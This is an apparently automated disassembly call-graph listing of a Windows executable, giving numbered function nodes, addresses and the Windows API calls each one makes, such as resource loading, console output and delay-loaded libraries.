20065->20064 20067 7ff7390c88ec 20065->20067 20066 7ff7390c3b10 9 API calls 20066->20071 20068 7ff7390c8bae 20067->20068 20072 7ff7390c8900 20067->20072 20069 7ff7390d9ae4 8 API calls 20068->20069 20082 7ff7390c8bb3 20069->20082 20070 7ff7390c8438 10 API calls 20070->20071 20071->20066 20071->20070 20073 7ff7390c89e0 GetFileAttributesW 20071->20073 20074 7ff7390c89a2 CompareStringW 20071->20074 20076 7ff7390c8a04 20071->20076 20075 7ff7390c893e 20072->20075 20077 7ff7390c8438 10 API calls 20072->20077 20073->20071 20073->20076 20074->20071 20075->20064 20078 7ff7390c8a4f 20076->20078 20079 7ff7390c8a0e 20076->20079 20077->20072 20080 7ff7390c8b83 20078->20080 20081 7ff7390c8a58 20078->20081 20087 7ff7390c8a2d GetFileAttributesW 20079->20087 20090 7ff7390c8a4a 20079->20090 20084 7ff7390d98e0 _handle_error 8 API calls 20080->20084 20091 7ff7390c3b10 9 API calls 20081->20091 20083 7ff7390c8bd7 20082->20083 20085 7ff7390c1b80 2 API calls 20082->20085 20086 7ff7390c8bf1 SetThreadExecutionState 20083->20086 20089 7ff7390c1b80 2 API calls 20083->20089 20088 7ff7390c8b92 20084->20088 20085->20083 20087->20079 20087->20090 20111 7ff7390d3fac GetCurrentDirectoryW 20088->20111 20089->20086 20090->20078 20092 7ff7390c8a69 20091->20092 20093 7ff7390c8a70 20092->20093 20094 7ff7390c8ae7 20092->20094 20095 7ff7390c8438 10 API calls 20093->20095 20096 7ff7390c3774 swprintf 46 API calls 20094->20096 20098 7ff7390c8a7c 20095->20098 20097 7ff7390c8b1a AllocConsole 20096->20097 20099 7ff7390c8b24 GetCurrentProcessId AttachConsole 20097->20099 20100 7ff7390c8b7a ExitProcess 20097->20100 20101 7ff7390c8438 10 API calls 20098->20101 20178 7ff7390de7d8 20099->20178 20103 7ff7390c8a88 20101->20103 20105 7ff7390c6118 48 API calls 20103->20105 20104 7ff7390c8b3e GetStdHandle WriteConsoleW Sleep FreeConsole 20104->20100 20106 7ff7390c8a92 20105->20106 20107 7ff7390c3774 swprintf 46 API calls 20106->20107 20108 7ff7390c8ac1 20107->20108 20109 7ff7390c6118 48 API calls 20108->20109 20110 7ff7390c8acb 20109->20110 20110->20100 20111->19781 20113 7ff7390c8438 10 API calls 20112->20113 20114 7ff7390d4805 OleInitialize 20113->20114 20115 7ff7390d482b 20114->20115 20116 7ff7390d4851 SHGetMalloc 20115->20116 20116->19783 20118 7ff7390d55c2 20117->20118 20119 7ff7390d55ca 20117->20119 20201 7ff7390d405c FindResourceW 20118->20201 20120 7ff7390d55d2 GetObjectW 20119->20120 20121 7ff7390d55e7 20119->20121 20120->20121 20123 7ff7390d3f0c 4 API calls 20121->20123 20124 7ff7390d55fc 20123->20124 20125 7ff7390d5652 20124->20125 20126 7ff7390d5622 20124->20126 20127 7ff7390d405c 11 API calls 20124->20127 20136 7ff7390c527c 20125->20136 20128 7ff7390d3f74 4 API calls 20126->20128 20129 7ff7390d560e 20127->20129 20130 7ff7390d562b 20128->20130 20129->20126 20131 7ff7390d5616 DeleteObject 20129->20131 20132 7ff7390d3f3c 4 API calls 20130->20132 20131->20126 20133 7ff7390d5636 20132->20133 20134 7ff7390d41fc 16 API calls 20133->20134 20135 7ff7390d5643 DeleteObject 20134->20135 20135->20125 20216 7ff7390c52ac 20136->20216 20138 7ff7390c528a 20269 7ff7390c5ca8 GetModuleHandleW FindResourceW 20138->20269 20140 7ff7390c5292 20140->19801 20152 7ff7390d6691 _snwprintf 20148->20152 20149 7ff7390d67a9 20150 7ff7390d98e0 _handle_error 8 API calls 20149->20150 20151 7ff7390d67b9 20150->20151 20151->19791 20151->19792 20152->20149 20153 7ff7390c71e4 78 API calls 20152->20153 20153->20152 20155 7ff7390d9920 _snwprintf 20154->20155 20156 7ff7390d810c SetEnvironmentVariableW 20155->20156 20157 7ff7390d8147 20156->20157 20158 7ff7390d8174 20157->20158 20161 7ff7390d8164 SetEnvironmentVariableW 20157->20161 20159 7ff7390d98e0 _handle_error 8 API calls 20158->20159 20160 7ff7390d8184 20159->20160 20160->19808 20161->20158 20175 7ff7390e2810 swprintf 20174->20175 20180 7ff7390e1e14 20175->20180 20179 7ff7390de7db 20178->20179 20179->20104 20179->20179 20181 7ff7390e1e42 20180->20181 20182 7ff7390e1e68 20180->20182 20183 7ff7390e4850 _set_fmode 15 API calls 20181->20183 20182->20181 20184 7ff7390e1e76 20182->20184 20185 7ff7390e1e47 20183->20185 20186 7ff7390deec0 _snwprintf 35 API calls 20184->20186 20187 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 20185->20187 20188 7ff7390e1e82 20186->20188 20200 7ff7390c885f 20187->20200 20189 7ff7390e5eb8 _snwprintf 39 API calls 20188->20189 20190 7ff7390e1ed8 20188->20190 20189->20188 20191 7ff7390e4850 _set_fmode 15 API calls 20190->20191 20192 7ff7390e1f52 20190->20192 20193 7ff7390e1f8a 20191->20193 20194 7ff7390e4850 _set_fmode 15 API calls 20192->20194 20196 7ff7390e2044 _snwprintf 20192->20196 20197 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 20193->20197 20195 7ff7390e2039 20194->20195 20198 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 20195->20198 20199 7ff7390e4850 _set_fmode 15 API calls 20196->20199 20196->20200 20197->20192 20198->20196 20199->20200 20200->20056 20200->20062 20202 7ff7390d4087 SizeofResource 20201->20202 20203 7ff7390d41d3 20201->20203 20202->20203 20204 7ff7390d40a1 LoadResource 20202->20204 20203->20119 20204->20203 20205 7ff7390d40ba LockResource 20204->20205 20205->20203 20206 7ff7390d40cf GlobalAlloc 20205->20206 20206->20203 20207 7ff7390d40f0 GlobalLock 20206->20207 20208 7ff7390d4102 BuildCatchObjectHelperInternal 20207->20208 20209 7ff7390d41ca GlobalFree 20207->20209 20210 7ff7390d4110 CreateStreamOnHGlobal 20208->20210 20209->20203 20211 7ff7390d41c1 GlobalUnlock 20210->20211 20212 7ff7390d412e GdipAlloc 20210->20212 20211->20209 20213 7ff7390d4143 20212->20213 20213->20211 20214 7ff7390d4192 GdipCreateHBITMAPFromBitmap 20213->20214 20215 7ff7390d41aa 20213->20215 20214->20215 20215->20211 20217 7ff7390c52ce _snwprintf 20216->20217 20218 7ff7390c5337 20217->20218 20219 7ff7390c52fc GetModuleFileNameW 20217->20219 20221 7ff7390c2420 14 API calls 20218->20221 20220 7ff7390c531d 20219->20220 20220->20218 20228 7ff7390c536c 20221->20228 20222 7ff7390c2054 75 API calls 20224 7ff7390c5bfe 20222->20224 20223 7ff7390c53a6 20271 7ff7390e13c0 20223->20271 20227 7ff7390d98e0 _handle_error 8 API calls 20224->20227 20230 7ff7390c5c0d 20227->20230 20228->20223 20231 7ff7390c5c74 73 API calls 20228->20231 20242 7ff7390c55de 20228->20242 20229 7ff7390e13c0 31 API calls 20239 7ff7390c53d7 __vcrt_FlsAlloc 20229->20239 20230->20138 20231->20228 20232 7ff7390c550b 20233 7ff7390c2900 77 API calls 20232->20233 20232->20242 20236 7ff7390c5523 20233->20236 20234 7ff7390c2a10 75 API calls 20234->20239 20235 7ff7390c2740 78 API calls 20235->20239 20236->20242 20238 7ff7390c2900 77 API calls 20238->20239 20239->20232 20239->20234 20239->20235 20239->20238 20239->20242 20242->20222 20270 7ff7390c5cd4 20269->20270 20270->20140 20272 7ff7390e13ed 20271->20272 20273 7ff7390e4850 _set_fmode 15 API calls 20272->20273 20278 7ff7390e1402 20272->20278 20274 7ff7390e13f7 20273->20274 20275 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 20274->20275 20275->20278 20276 7ff7390d98e0 _handle_error 8 API calls 20277 7ff7390c53c1 20276->20277 20277->20229 20278->20276 20299 7ff7390e4540 abort 35 API calls 20298->20299 20300 7ff7390e406b 20299->20300 20301 7ff7390e4100 abort 35 API calls 20300->20301 20302 7ff7390e4086 20301->20302 21225 7ff7390e3f70 21226 7ff7390e3f86 21225->21226 21227 7ff7390e3fb1 21225->21227 21233 7ff7390e64b8 EnterCriticalSection 21226->21233 21462 7ff7390e43c0 21463 7ff7390e43c5 21462->21463 21464 7ff7390e43da 21462->21464 21468 7ff7390e43e0 21463->21468 21469 7ff7390e4422 21468->21469 21470 7ff7390e442a 21468->21470 21472 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 21469->21472 21471 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 21470->21471 21473 7ff7390e4437 21471->21473 21472->21470 21474 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 21473->21474 21475 7ff7390e4444 21474->21475 21476 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 21475->21476 21477 7ff7390e4451 21476->21477 21478 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 21477->21478 21479 7ff7390e445e 21478->21479 21480 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 21479->21480 21481 7ff7390e446b 21480->21481 21482 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 21481->21482 21483 7ff7390e4478 21482->21483 21484 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 21483->21484 21485 7ff7390e4485 21484->21485 21486 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 21485->21486 21487 7ff7390e4495 21486->21487 21488 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 21487->21488 21489 7ff7390e44a5 21488->21489 21494 7ff7390e41c0 21489->21494 21508 7ff7390e64b8 EnterCriticalSection 21494->21508 16945 7ff7390d8cf5 16946 7ff7390d8c28 16945->16946 16949 7ff7390d9330 16946->16949 16975 7ff7390d8f8c 16949->16975 16952 7ff7390d93bb 16953 7ff7390d929c DloadReleaseSectionWriteAccess 6 API calls 16952->16953 16954 7ff7390d93c8 RaiseException 16953->16954 16955 7ff7390d8c67 16954->16955 16956 7ff7390d93e4 16957 7ff7390d946d LoadLibraryExA 16956->16957 16958 7ff7390d95b5 16956->16958 16960 7ff7390d94d9 16956->16960 16962 7ff7390d94ed 16956->16962 16959 7ff7390d9484 GetLastError 16957->16959 16957->16960 16983 7ff7390d929c 16958->16983 16963 7ff7390d94ae 16959->16963 16964 7ff7390d9499 16959->16964 16960->16962 16965 7ff7390d94e4 FreeLibrary 16960->16965 16961 7ff7390d954b GetProcAddress 16961->16958 16968 7ff7390d9560 GetLastError 16961->16968 16962->16958 16962->16961 16967 7ff7390d929c DloadReleaseSectionWriteAccess 6 API calls 16963->16967 16964->16960 16964->16963 16965->16962 16969 7ff7390d94bb RaiseException 16967->16969 16970 7ff7390d9575 16968->16970 16969->16955 16970->16958 16971 7ff7390d929c DloadReleaseSectionWriteAccess 6 API calls 16970->16971 16972 7ff7390d9597 RaiseException 16971->16972 16973 7ff7390d8f8c DloadAcquireSectionWriteAccess 6 API calls 16972->16973 16974 7ff7390d95b1 16973->16974 16974->16958 16976 7ff7390d8fa2 16975->16976 16982 7ff7390d9007 16975->16982 16991 7ff7390d9038 16976->16991 16979 7ff7390d9002 16981 7ff7390d9038 DloadReleaseSectionWriteAccess 3 API calls 16979->16981 16981->16982 16982->16952 16982->16956 16984 7ff7390d92ac 16983->16984 16985 7ff7390d9305 16983->16985 16986 7ff7390d9038 DloadReleaseSectionWriteAccess 3 API calls 16984->16986 16985->16955 16987 7ff7390d92b1 16986->16987 16988 7ff7390d9300 16987->16988 16989 7ff7390d920c DloadProtectSection 3 API calls 16987->16989 16990 7ff7390d9038 DloadReleaseSectionWriteAccess 3 API calls 16988->16990 16989->16988 16990->16985 16992 7ff7390d9053 16991->16992 16993 7ff7390d8fa7 16991->16993 16992->16993 16994 7ff7390d9058 GetModuleHandleW 16992->16994 16993->16979 16998 7ff7390d920c 16993->16998 16995 7ff7390d9072 GetProcAddress 16994->16995 16996 7ff7390d906d 16994->16996 16995->16996 16997 7ff7390d9087 GetProcAddress 16995->16997 16996->16993 16997->16996 17000 7ff7390d922e DloadProtectSection 16998->17000 16999 7ff7390d926e VirtualProtect 17001 7ff7390d9236 16999->17001 17000->16999 17000->17001 17003 7ff7390d90d8 VirtualQuery 17000->17003 17001->16979 17004 7ff7390d9101 17003->17004 17005 7ff7390d9151 17004->17005 17006 7ff7390d910d GetSystemInfo 17004->17006 17005->16999 17006->17005 17011 7ff7390ed3e1 17012 7ff7390ed3ff 17011->17012 17023 7ff7390db514 17012->17023 17014 7ff7390ed408 17015 7ff7390db514 std::_Xinvalid_argument 2 API calls 17014->17015 17016 7ff7390ed44d 17015->17016 17028 7ff7390c9d94 17016->17028 17024 7ff7390db533 17023->17024 17025 7ff7390db550 RtlPcToFileHeader 17023->17025 17024->17025 17026 7ff7390db568 17025->17026 17027 7ff7390db577 RaiseException 17025->17027 17026->17027 17027->17014 17029 7ff7390c9dbd 17028->17029 17030 7ff7390c9d99 17028->17030 17032 7ff7390cb31c 17029->17032 17030->17029 17110 7ff7390cad10 17030->17110 17033 7ff7390cb333 17032->17033 17034 7ff7390dea20 _invalid_parameter_noinfo_noreturn 31 API calls 17033->17034 17035 7ff7390cb35c _snwprintf 17034->17035 17235 7ff7390c93f0 17035->17235 17039 7ff7390cb421 17269 7ff7390d999c 17039->17269 17041 7ff7390cc820 17042 7ff7390cc854 17041->17042 17046 7ff7390cc89b 17041->17046 17042->17041 17042->17046 17543 7ff7390c3468 17042->17543 17044 7ff7390cd938 92 API calls 17104 7ff7390cb467 memcpy_s BuildCatchObjectHelperInternal 17044->17104 17048 7ff7390cc8c7 17046->17048 17561 7ff7390c1a78 17046->17561 17050 7ff7390cc901 17048->17050 17564 7ff7390c1990 17048->17564 17570 7ff7390ca2ac 17050->17570 17052 7ff7390cd7c8 18 API calls 17052->17104 17053 7ff7390cad74 CompareStringW CompareStringW 17053->17104 17057 7ff7390c93f0 67 API calls 17057->17104 17058 7ff7390cd4bc 102 API calls 17058->17104 17060 7ff7390cdcc8 92 API calls 17060->17104 17070 7ff7390c1a78 69 API calls 17070->17104 17072 7ff7390cca13 17592 7ff7390c36c0 17072->17592 17073 7ff7390ca7e8 69 API calls 17073->17104 17075 7ff7390cca19 17596 7ff7390c36e0 17075->17596 17076 7ff7390d2568 MultiByteToWideChar 17076->17104 17079 7ff7390cca1f 17080 7ff7390dea20 _invalid_parameter_noinfo_noreturn 31 API calls 17079->17080 17081 7ff7390cca25 17080->17081 17096 7ff7390cc816 17537 7ff7390c17a8 17096->17537 17100 7ff7390c36f4 47 API calls 17100->17104 17102 7ff7390c3388 16 API calls 17102->17104 17104->17041 17104->17044 17104->17052 17104->17053 17104->17057 17104->17058 17104->17060 17104->17070 17104->17072 17104->17073 17104->17075 17104->17076 17104->17079 17104->17096 17104->17100 17104->17102 17105 7ff7390c2c38 47 API calls 17104->17105 17107 7ff7390d999c 4 API calls 17104->17107 17108 7ff7390c2900 77 API calls 17104->17108 17278 7ff7390d0094 17104->17278 17283 7ff7390c8c30 17104->17283 17286 7ff7390c1648 17104->17286 17294 7ff7390c2a10 17104->17294 17303 7ff7390d0230 17104->17303 17308 7ff7390c40e0 17104->17308 17312 7ff7390c93fc 17104->17312 17320 7ff7390cd2c4 17104->17320 17326 7ff7390cca28 17104->17326 17379 7ff7390ca490 17104->17379 17385 7ff7390c1f4c 17104->17385 17388 7ff7390ca89c 17104->17388 17394 7ff7390ca384 17104->17394 17406 7ff7390c9938 17104->17406 17412 7ff7390c9dc8 17104->17412 17422 7ff7390cab84 17104->17422 17430 7ff7390cadc8 17104->17430 17437 7ff7390cdb58 17104->17437 17443 7ff7390c9eb8 17104->17443 17455 7ff7390c31d4 17104->17455 17464 7ff7390d0ae0 17104->17464 17492 7ff7390c3120 17104->17492 17495 7ff7390c2ee4 17104->17495 17506 7ff7390c1e30 17104->17506 17513 7ff7390ca048 17104->17513 17527 7ff7390c925c 17104->17527 17105->17104 17107->17104 17108->17104 17111 7ff7390cad23 17110->17111 17112 7ff7390cad48 17110->17112 17111->17112 17114 7ff7390dea20 17111->17114 17112->17030 17119 7ff7390de958 17114->17119 17130 7ff7390e45d4 GetLastError 17119->17130 17122 7ff7390dea50 _invalid_parameter_noinfo_noreturn 16 API calls 17123 7ff7390de9fe 17122->17123 17124 7ff7390de958 _invalid_parameter_noinfo_noreturn 31 API calls 17123->17124 17125 7ff7390dea19 17124->17125 17126 7ff7390dea50 17125->17126 17127 7ff7390dea5e 17126->17127 17213 7ff7390de7f4 17127->17213 17131 7ff7390e45fd 17130->17131 17132 7ff7390e45f8 17130->17132 17136 7ff7390e4646 17131->17136 17154 7ff7390e6b24 17131->17154 17149 7ff7390e6784 17132->17149 17138 7ff7390e4655 SetLastError 17136->17138 17139 7ff7390e464b SetLastError 17136->17139 17137 7ff7390e461c 17161 7ff7390e46e4 17137->17161 17141 7ff7390de982 17138->17141 17139->17141 17141->17122 17144 7ff7390e4623 17144->17139 17145 7ff7390e463a 17172 7ff7390e42e8 17145->17172 17177 7ff7390e6534 17149->17177 17152 7ff7390e67c6 TlsGetValue 17153 7ff7390e67b7 17152->17153 17153->17131 17159 7ff7390e6b35 abort 17154->17159 17155 7ff7390e6b86 17190 7ff7390e4850 17155->17190 17156 7ff7390e6b6a HeapAlloc 17157 7ff7390e4614 17156->17157 17156->17159 17157->17137 17167 7ff7390e67dc 17157->17167 17159->17155 17159->17156 17187 7ff7390e2cb4 17159->17187 17162 7ff7390e46e9 RtlFreeHeap 17161->17162 17164 7ff7390e4719 Concurrency::details::SchedulerProxy::DeleteThis 17161->17164 17163 7ff7390e4704 17162->17163 17162->17164 17165 7ff7390e4850 _set_fmode 13 API calls 17163->17165 17164->17144 17166 7ff7390e4709 GetLastError 17165->17166 17166->17164 17168 7ff7390e6534 __vcrt_uninitialize_ptd 5 API calls 17167->17168 17169 7ff7390e680f 17168->17169 17170 7ff7390e6829 TlsSetValue 17169->17170 17171 7ff7390e4633 17169->17171 17170->17171 17171->17137 17171->17145 17199 7ff7390e4268 17172->17199 17182 7ff7390e6595 17177->17182 17183 7ff7390e6590 17177->17183 17178 7ff7390e6642 17181 7ff7390e6650 GetProcAddress 17178->17181 17178->17182 17179 7ff7390e65bd LoadLibraryExW 17180 7ff7390e65de GetLastError 17179->17180 17179->17183 17180->17183 17184 7ff7390e65e9 LoadLibraryExW 17180->17184 17185 7ff7390e6661 17181->17185 17182->17152 17182->17153 17183->17178 17183->17179 17183->17182 17186 7ff7390e6627 FreeLibrary 17183->17186 17184->17183 17185->17182 17186->17183 17193 7ff7390e2cf4 17187->17193 17191 7ff7390e45d4 _invalid_parameter_noinfo_noreturn 15 API calls 17190->17191 17192 7ff7390e4859 17191->17192 17192->17157 17198 7ff7390e64b8 EnterCriticalSection 17193->17198 17211 7ff7390e64b8 EnterCriticalSection 17199->17211 17214 7ff7390de82e memcpy_s abort 17213->17214 17215 7ff7390de856 RtlCaptureContext RtlLookupFunctionEntry 17214->17215 17216 7ff7390de8c6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17215->17216 17217 7ff7390de890 RtlVirtualUnwind 17215->17217 17219 7ff7390de918 abort 17216->17219 17217->17216 17221 7ff7390d98e0 17219->17221 17224 7ff7390d98e9 17221->17224 17222 7ff7390d9a10 IsProcessorFeaturePresent 17225 7ff7390d9a28 17222->17225 17223 7ff7390d98f4 GetCurrentProcess TerminateProcess 17224->17222 17224->17223 17230 7ff7390d9c04 RtlCaptureContext 17225->17230 17231 7ff7390d9c1e RtlLookupFunctionEntry 17230->17231 17232 7ff7390d9c34 RtlVirtualUnwind 17231->17232 17233 7ff7390d9a3b 17231->17233 17232->17231 17232->17233 17234 7ff7390d99d8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17233->17234 17236 7ff7390d8478 _snwprintf 17235->17236 17599 7ff7390c6118 17236->17599 17243 7ff7390d98e0 _handle_error 8 API calls 17244 7ff7390cb40b 17243->17244 17245 7ff7390c2c38 17244->17245 17246 7ff7390c2c45 17245->17246 17253 7ff7390c2c6b 17245->17253 17248 7ff7390d999c 4 API calls 17246->17248 17247 7ff7390c36c0 Concurrency::cancel_current_task 2 API calls 17257 7ff7390c2c71 17247->17257 17249 7ff7390c2c4d 17248->17249 17250 7ff7390c2c55 17249->17250 17251 7ff7390dea20 _invalid_parameter_noinfo_noreturn 31 API calls 17249->17251 17250->17039 17251->17253 17252 7ff7390c2dae 17254 7ff7390c36e0 47 API calls 17252->17254 17253->17247 17256 7ff7390c2db4 17254->17256 17255 7ff7390c2cce 17261 7ff7390c2c38 47 API calls 17255->17261 18262 7ff7390db5b4 17256->18262 17257->17252 17257->17255 17259 7ff7390c2da3 17257->17259 17260 7ff7390c2d03 17257->17260 17262 7ff7390c36c0 Concurrency::cancel_current_task 2 API calls 17259->17262 17260->17255 17264 7ff7390c2d19 17260->17264 17267 7ff7390c2d14 BuildCatchObjectHelperInternal 17261->17267 17262->17267 17263 7ff7390c2de1 17263->17039 17265 7ff7390d999c 4 API calls 17264->17265 17264->17267 17265->17267 17266 7ff7390dea20 _invalid_parameter_noinfo_noreturn 31 API calls 17266->17252 17267->17266 17268 7ff7390c2d76 17267->17268 17268->17039 17271 7ff7390d99a7 17269->17271 17270 7ff7390d99c0 17270->17104 17271->17270 17272 7ff7390e2cb4 abort 2 API calls 17271->17272 17273 7ff7390d99c6 17271->17273 17272->17271 17274 7ff7390d99d1 17273->17274 18266 7ff7390da1d8 17273->18266 17275 7ff7390c36c0 Concurrency::cancel_current_task 2 API calls 17274->17275 17277 7ff7390d99d7 17275->17277 18270 7ff7390cd938 17278->18270 17280 7ff7390d00b9 17281 7ff7390d98e0 _handle_error 8 API calls 17280->17281 17282 7ff7390d0228 17281->17282 17282->17104 18421 7ff7390c8c90 SystemTimeToFileTime 17283->18421 17287 7ff7390c167a 17286->17287 18435 7ff7390c1524 17287->18435 17295 7ff7390c2a2d 17294->17295 17296 7ff7390c2a49 17294->17296 17297 7ff7390c2a5b 17295->17297 18476 7ff7390c1d98 17295->18476 17296->17297 17298 7ff7390c2a61 SetFilePointer 17296->17298 17297->17104 17298->17297 17300 7ff7390c2a7e GetLastError 17298->17300 17300->17297 17301 7ff7390c2a88 17300->17301 17301->17297 17302 7ff7390c1d98 73 API calls 17301->17302 17302->17297 17304 7ff7390cd938 92 API calls 17303->17304 17307 7ff7390d0255 17304->17307 17305 7ff7390d98e0 _handle_error 8 API calls 17306 7ff7390d036f 17305->17306 17306->17104 17307->17305 17311 7ff7390c40ee _snwprintf 17308->17311 17309 7ff7390d98e0 _handle_error 8 API calls 17310 7ff7390c4264 17309->17310 17310->17104 17311->17309 17312->17104 17313 7ff7390d8504 _snwprintf 17312->17313 17314 7ff7390c6118 48 API calls 17313->17314 17315 7ff7390d8534 17314->17315 17316 7ff7390c3774 swprintf 46 API calls 17315->17316 17317 7ff7390d8549 SetDlgItemTextW SetWindowTextW 17316->17317 17321 7ff7390cd2d0 _snwprintf 17320->17321 17322 7ff7390c37fc 15 API calls 17321->17322 17323 7ff7390cd327 17322->17323 17324 7ff7390d98e0 _handle_error 8 API calls 17323->17324 17325 7ff7390cd35a 17324->17325 17325->17104 17327 7ff7390cca8a 17326->17327 17330 7ff7390ccacd 17326->17330 18490 7ff7390cd844 17327->18490 17332 7ff7390ccb74 17330->17332 17333 7ff7390ccb22 17330->17333 18530 7ff7390c236c 17330->18530 17335 7ff7390ccba0 17332->17335 17370 7ff7390ccc09 17332->17370 17333->17332 18500 7ff7390c2900 17333->18500 17339 7ff7390ccbe3 17335->17339 17343 7ff7390ccbaa 17335->17343 18506 7ff7390ce354 17339->18506 17346 7ff7390c1f4c 69 API calls 17343->17346 17350 7ff7390cccec 17351 7ff7390ccbf1 17350->17351 17353 7ff7390cd6d4 78 API calls 17350->17353 17353->17351 17370->17350 18549 7ff7390cda28 17370->18549 18555 7ff7390c93b8 17370->18555 18558 7ff7390cd6d4 17370->18558 17380 7ff7390ca506 17379->17380 17381 7ff7390ca4da 17379->17381 17382 7ff7390ca500 17380->17382 18745 7ff7390ca560 17380->18745 17381->17382 17383 7ff7390cad10 31 API calls 17381->17383 17382->17104 17383->17381 17386 7ff7390c18d8 69 API calls 17385->17386 17387 7ff7390c1f6d 17386->17387 17387->17104 17389 7ff7390ca902 memcpy_s 17388->17389 17390 7ff7390c8dec 69 API calls 17389->17390 17391 7ff7390ca925 17390->17391 17392 7ff7390d98e0 _handle_error 8 API calls 17391->17392 17393 7ff7390ca931 17392->17393 17393->17104 17395 7ff7390ca481 17394->17395 17396 7ff7390ca3b8 17394->17396 17397 7ff7390c36e0 47 API calls 17395->17397 17398 7ff7390ca3c5 17396->17398 17399 7ff7390ca407 17396->17399 17404 7ff7390ca402 BuildCatchObjectHelperInternal 17397->17404 17400 7ff7390c2c38 47 API calls 17398->17400 17402 7ff7390d999c 4 API calls 17399->17402 17399->17404 17400->17404 17401 7ff7390dea20 _invalid_parameter_noinfo_noreturn 31 API calls 17402->17404 17404->17401 17405 7ff7390ca45a 17404->17405 17405->17104 17407 7ff7390c996a 17406->17407 18775 7ff7390c9ba8 17407->18775 17409 7ff7390c9979 17413 7ff7390c9df2 17412->17413 17414 7ff7390c9e33 17413->17414 17415 7ff7390c9eb1 17413->17415 17420 7ff7390c9e1b 17413->17420 18798 7ff7390c99b4 17414->18798 18803 7ff7390cb15c 17415->18803 17420->17104 17423 7ff7390cab96 17422->17423 17424 7ff7390cabc4 17423->17424 17425 7ff7390dea20 _invalid_parameter_noinfo_noreturn 31 API calls 17423->17425 17424->17104 17426 7ff7390cabe7 17425->17426 17427 7ff7390cac22 17426->17427 17428 7ff7390dea20 _invalid_parameter_noinfo_noreturn 31 API calls 17426->17428 17427->17104 17429 7ff7390cac43 17428->17429 17431 7ff7390cad74 2 API calls 17430->17431 17432 7ff7390caded 17431->17432 17433 7ff7390c3774 swprintf 46 API calls 17432->17433 17434 7ff7390cae2c 17433->17434 17435 7ff7390d98e0 _handle_error 8 API calls 17434->17435 17438 7ff7390cdb96 17437->17438 17440 7ff7390cdb8c 17437->17440 17438->17440 17441 7ff7390c2900 77 API calls 17438->17441 17439 7ff7390cdbba 17442 7ff7390c2a10 75 API calls 17439->17442 17440->17104 17441->17439 17442->17440 17444 7ff7390c9efb 17443->17444 17446 7ff7390ca038 17443->17446 17445 7ff7390c9f1a 17444->17445 17444->17446 17448 7ff7390c9f69 17444->17448 17449 7ff7390c2c38 47 API calls 17445->17449 17447 7ff7390c36c0 Concurrency::cancel_current_task 2 API calls 17446->17447 17450 7ff7390ca044 17447->17450 17451 7ff7390d999c 4 API calls 17448->17451 17453 7ff7390c9f5f BuildCatchObjectHelperInternal 17448->17453 17449->17453 17451->17453 17452 7ff7390ca002 17452->17104 17453->17452 17454 7ff7390dea20 _invalid_parameter_noinfo_noreturn 31 API calls 17453->17454 17454->17446 17459 7ff7390c31f1 _snwprintf __vcrt_FlsAlloc 17455->17459 17456 7ff7390c3360 17457 7ff7390d98e0 _handle_error 8 API calls 17456->17457 17458 7ff7390c3375 17457->17458 17458->17104 17459->17456 17460 7ff7390c334a 17459->17460 17462 7ff7390c37fc 15 API calls 17459->17462 18810 7ff7390c3018 17459->18810 18820 7ff7390c36f4 17460->18820 17462->17459 17465 7ff7390d0b2a 17464->17465 17467 7ff7390d0b3f 17465->17467 17471 7ff7390d0be7 17465->17471 17466 7ff7390d0b8f 17469 7ff7390d0ba2 17466->17469 17472 7ff7390cda28 92 API calls 17466->17472 17467->17466 17470 7ff7390cda28 92 API calls 17467->17470 17468 7ff7390cda28 92 API calls 17468->17471 17473 7ff7390cda28 92 API calls 17469->17473 17476 7ff7390d0bcc 17469->17476 17470->17467 17471->17468 17471->17476 17472->17469 17473->17476 17475 7ff7390d0c90 18844 7ff7390d093c 17475->18844 17476->17475 18840 7ff7390d0658 17476->18840 18939 7ff7390c3134 17492->18939 17500 7ff7390c2f02 _snwprintf 17495->17500 17496 7ff7390d98e0 _handle_error 8 API calls 17497 7ff7390c2ff4 17496->17497 17497->17104 17498 7ff7390c2fb1 17499 7ff7390c3388 16 API calls 17498->17499 17501 7ff7390c2fd7 17498->17501 17499->17501 17500->17498 17500->17501 17502 7ff7390c3011 17500->17502 18949 7ff7390c3388 17500->18949 17501->17496 18964 7ff7390d9ae4 17502->18964 17507 7ff7390c1c18 2 API calls 17506->17507 17511 7ff7390c1e6e 17507->17511 17508 7ff7390c1ee5 17509 7ff7390d98e0 _handle_error 8 API calls 17508->17509 17510 7ff7390c1ef5 17509->17510 17510->17104 17511->17508 17512 7ff7390c1834 69 API calls 17511->17512 17512->17511 17514 7ff7390ca0ba 17513->17514 17516 7ff7390ca29e 17513->17516 17515 7ff7390ca0ef 17514->17515 17514->17516 17518 7ff7390ca141 17514->17518 17519 7ff7390c2c38 47 API calls 17515->17519 17517 7ff7390c36c0 Concurrency::cancel_current_task 2 API calls 17516->17517 17520 7ff7390ca2aa 17517->17520 17521 7ff7390ca137 17518->17521 17522 7ff7390d999c 4 API calls 17518->17522 17519->17521 18977 7ff7390c9c74 17521->18977 17522->17521 17530 7ff7390c9271 _snwprintf 17527->17530 17528 7ff7390d98e0 _handle_error 8 API calls 17529 7ff7390c93a3 17528->17529 17529->17104 17532 7ff7390c92a5 17530->17532 18981 7ff7390d81fc 17530->18981 17532->17528 17533 7ff7390c92f6 17533->17532 17538 7ff7390c17f8 memcpy_s 17537->17538 17539 7ff7390c8dec 69 API calls 17538->17539 17540 7ff7390c1819 17539->17540 17541 7ff7390d98e0 _handle_error 8 API calls 17540->17541 17544 7ff7390c347f _snwprintf 17543->17544 17545 7ff7390c3134 11 API calls 